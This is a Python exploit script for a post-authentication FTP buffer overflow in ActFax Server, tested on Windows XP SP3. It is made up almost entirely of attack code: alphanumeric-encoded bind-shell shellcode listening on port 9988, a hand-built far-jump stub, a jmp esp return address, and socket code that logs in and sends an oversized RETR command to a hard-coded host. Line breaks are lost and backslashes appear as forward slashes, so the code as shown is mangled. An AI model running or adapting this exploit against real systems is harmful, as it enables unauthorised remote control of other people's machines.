#!/usr/bin/python#-----------------------------------------------------------------------------------# Exploit Title: ActFax Server FTP Remote BOF (post auth)# Author: b33f - Ruben Boonen# Software Link: http://www.actfax.com/download/actfax_setup_en.exe# Tested on: Windows XP PRO SP3 (version 2002) - VMware Workstation#-----------------------------------------------------------------------------------# Credit goes to chap0 for discovering the bug.# Allot of thanks to PoURaN, for helping a n00b understand assembly better!!!#----------------------------------------------------------------------------------- import socketimport sys print "/nActFax XP SP3 Pro..."print "Hunting for alphanumeric code!!/n"#-----------------------------------------------------------------------------------# payload => win32_bind LPORT=9988 Size=709 => Encoder=PexAlphaNum#-----------------------------------------------------------------------------------shellcode = ("/xeb/x03/x59/xeb/x05/xe8/xf8/xff/xff/xff/x4f/x49/x49/x49/x49/x49""/x49/x51/x5a/x56/x54/x58/x36/x33/x30/x56/x58/x34/x41/x30/x42/x36""/x48/x48/x30/x42/x33/x30/x42/x43/x56/x58/x32/x42/x44/x42/x48/x34""/x41/x32/x41/x44/x30/x41/x44/x54/x42/x44/x51/x42/x30/x41/x44/x41""/x56/x58/x34/x5a/x38/x42/x44/x4a/x4f/x4d/x4e/x4f/x4c/x46/x4b/x4e""/x4d/x44/x4a/x4e/x49/x4f/x4f/x4f/x4f/x4f/x4f/x4f/x42/x36/x4b/x38""/x4e/x56/x46/x32/x46/x52/x4b/x48/x45/x34/x4e/x43/x4b/x38/x4e/x47""/x45/x50/x4a/x57/x41/x30/x4f/x4e/x4b/x38/x4f/x44/x4a/x41/x4b/x48""/x4f/x55/x42/x32/x41/x30/x4b/x4e/x49/x44/x4b/x48/x46/x33/x4b/x38""/x41/x30/x50/x4e/x41/x33/x42/x4c/x49/x49/x4e/x4a/x46/x58/x42/x4c""/x46/x57/x47/x50/x41/x4c/x4c/x4c/x4d/x30/x41/x30/x44/x4c/x4b/x4e""/x46/x4f/x4b/x53/x46/x55/x46/x42/x4a/x42/x45/x47/x45/x4e/x4b/x48""/x4f/x35/x46/x52/x41/x30/x4b/x4e/x48/x36/x4b/x58/x4e/x30/x4b/x44""/x4b/x58/x4f/x55/x4e/x51/x41/x30/x4b/x4e/x43/x30/x4e/x52/x4b/x38""/x49/x58/x4e/x56/x46/x42/x4e/x51/x41/x56/x43/x4c/x41/x33/x4b/x4d""/x46/x46/x4b/x48/x43/x34/x42/x43/x4b/x48/x42/x44/x4e/x50/x4b/x38""/x42/x47/x4e/x51/x4d/x4a/x4b/x38/x42/x54/x4a/x50/x50/x35/x4a/x56""/x50/x38/x50/x54/x50/x30/x4e/x4e/x42/x55/x4f/x4f/x48/x4d/x48/x36""/x43/x35/x48/x36/x4a/x56/x43/x33/x44/x33/x4a/x46/x47/x47/x43/x47""/x44/x33/x4f/x55/x46/x45/x4f/x4f/x42/x4d/x4a/x56/x4b/x4c/x4d/x4e""/x4e/x4f/x4b/x43/x42/x45/x4f/x4f/x48/x4d/x4f/x35/x49/x58/x45/x4e""/x48/x56/x41/x48/x4d/x4e/x4a/x30/x44/x50/x45/x35/x4c/x46/x44/x50""/x4f/x4f/x42/x4d/x4a/x56/x49/x4d/x49/x30/x45/x4f/x4d/x4a/x47/x55""/x4f/x4f/x48/x4d/x43/x45/x43/x55/x43/x55/x43/x45/x43/x55/x43/x44""/x43/x35/x43/x44/x43/x45/x4f/x4f/x42/x4d/x48/x36/x4a/x56/x47/x52""/x46/x30/x48/x36/x43/x55/x49/x38/x41/x4e/x45/x59/x4a/x36/x46/x4a""/x4c/x51/x42/x57/x47/x4c/x47/x45/x4f/x4f/x48/x4d/x4c/x56/x42/x31""/x41/x45/x45/x45/x4f/x4f/x42/x4d/x4a/x46/x46/x4a/x4d/x4a/x50/x32""/x49/x4e/x47/x55/x4f/x4f/x48/x4d/x43/x55/x45/x45/x4f/x4f/x42/x4d""/x4a/x56/x45/x4e/x49/x34/x48/x48/x49/x54/x47/x55/x4f/x4f/x48/x4d""/x42/x35/x46/x55/x46/x55/x45/x45/x4f/x4f/x42/x4d/x43/x39/x4a/x46""/x47/x4e/x49/x47/x48/x4c/x49/x57/x47/x45/x4f/x4f/x48/x4d/x45/x55""/x4f/x4f/x42/x4d/x48/x36/x4c/x56/x46/x46/x48/x36/x4a/x46/x43/x46""/x4d/x56/x49/x38/x45/x4e/x4c/x46/x42/x45/x49/x35/x49/x42/x4e/x4c""/x49/x58/x47/x4e/x4c/x46/x46/x44/x49/x38/x44/x4e/x41/x53/x42/x4c""/x43/x4f/x4c/x4a/x50/x4f/x44/x54/x4d/x32/x50/x4f/x44/x44/x4e/x32""/x43/x59/x4d/x58/x4c/x57/x4a/x33/x4b/x4a/x4b/x4a/x4b/x4a/x4a/x46""/x44/x47/x50/x4f/x43/x4b/x48/x31/x4f/x4f/x45/x37/x46/x44/x4f/x4f""/x48/x4d/x4b/x45/x47/x45/x44/x35/x41/x55/x41/x45/x41/x35/x4c/x56""/x41/x30/x41/x45/x41/x55/x45/x55/x41/x45/x4f/x4f/x42/x4d/x4a/x36""/x4d/x4a/x49/x4d/x45/x30/x50/x4c/x43/x55/x4f/x4f/x48/x4d/x4c/x56""/x4f/x4f/x4f/x4f/x47/x43/x4f/x4f/x42/x4d/x4b/x38/x47/x35/x4e/x4f""/x43/x38/x46/x4c/x46/x46/x4f/x4f/x48/x4d/x44/x55/x4f/x4f/x42/x4d""/x4a/x36/x42/x4f/x4c/x58/x46/x50/x4f/x55/x43/x35/x4f/x4f/x48/x4d""/x4f/x4f/x42/x4d/x5a")#-----------------------------------------------------------------------------------# ASCII encoded  => Size=52# Decoded opcode => E9DE140000 - JMP 0178D7A7#-----------------------------------------------------------------------------------farjump = ("/x25/x4A/x4D/x4E/x55"     # AND EAX,554E4D4A"/x25/x35/x32/x31/x2A"     # AND EAX,2A313235"/x2D/x55/x55/x55/x5A"     # SUB EAX,5A555555"/x2D/x55/x55/x55/x5A"     # SUB EAX,5A555555"/x2D/x56/x55/x55/x5B"     # SUB EAX,5B555556"/x50"                     # PUSH EAX"/x25/x4A/x4D/x4E/x55"     # AND EAX,554E4D4A"/x25/x35/x32/x31/x2A"     # AND EAX,2A313235"/x2D/x5D/x60/x4E/x55"     # SUB EAX,554E605D"/x2D/x5D/x60/x4E/x55"     # SUB EAX,554E605D"/x2D/x5D/x60/x4E/x55"     # SUB EAX,554E605D"/x50"                     # PUSH EAX"/xEB/xC1")                # JMP SHORT 0112CAE0 (back to the beginning of ESP,                           # ESP now points to our decoded far-jump).#-----------------------------------------------------------------------------------## At crash time our buffer is copied several times into memory (some of these are# corrupt), so we write some fancy far-jump instruction in ESP. After this is# decoded in memory we jump to our nop bytes (i think 3de itteration of our buffer).# Ironically this doesn't even crash the program, only when you close the bind# shell connection does the program crash...## jmp esp - user32.dll => 0x7E429353#-----------------------------------------------------------------------------------buffer = "/x90"*41 + shellcode + "/x90"*23 + "/x53/x93/x42/x7E" + "/x90"*1 + farjump + "/x90"*175s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)connect=s.connect(('192.168.1.71',21))s.recv(1024)s.send('USER ' + 'b33f/r/n')print (s.recv(1024))s.send('PASS b33f/r/n')print (s.recv(1024))s.send('RETR ' + buffer + '/r/n')s.close